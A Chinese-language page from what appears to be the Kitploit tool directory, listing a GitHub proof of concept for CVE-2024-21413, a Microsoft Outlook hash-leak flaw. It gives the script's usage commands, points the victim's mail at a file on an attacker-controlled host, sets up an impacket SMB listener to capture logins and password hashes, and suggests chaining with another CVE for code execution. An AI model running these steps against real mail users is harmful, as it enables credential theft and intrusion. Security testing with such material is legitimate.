Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/r00tb1t/cve-2024-21413-poc
密码破解漏洞分析漏洞利用信息收集学习与教育电子邮件安全
GitHubr00tb1t/cve-2024-21413-poc

CVE-2024-21413-POC

Microsoft Outlook 信息泄露漏洞(泄露密码哈希)- CVE-2024-21413 POC

查看仓库
17232年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-21413 - POC

使用方法:

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf

[!NOTE] r00tb1t : 是来自攻击者机器(xx.xx.xx.xx)的共享测试文件(本例中为Word文件)。

为确保符合SPF、DKIM和DMARC,请使用合法的$IP和域名。

如果尚未安装pexpect库,请确保使用pip install pexpect进行安装。

执行POC的提示:

  • 运行一个smb监听器 impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp 。
  • 运行POC

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf

  • 点击收到的邮件中的链接,然后砰!你应该能在监听器中获取到登录名和哈希值。
  • 将此CVE与CVE-2023-21716结合使用,以获得RCE !!!
  • 致敬 & 关于CVE-2024-21413的详细信息 。
  • 解决方案/修复:

[!CAUTION] ⚠️ 免责声明:重要提示:此脚本仅供教育、道德测试和合法使用。未经明确许可,切勿在任何系统或网络上使用。未经授权访问计算机系统和网络是违法的,进行未授权活动的用户将面临法律追责。作者对因滥用此脚本造成的任何损害概不负责。

下载工具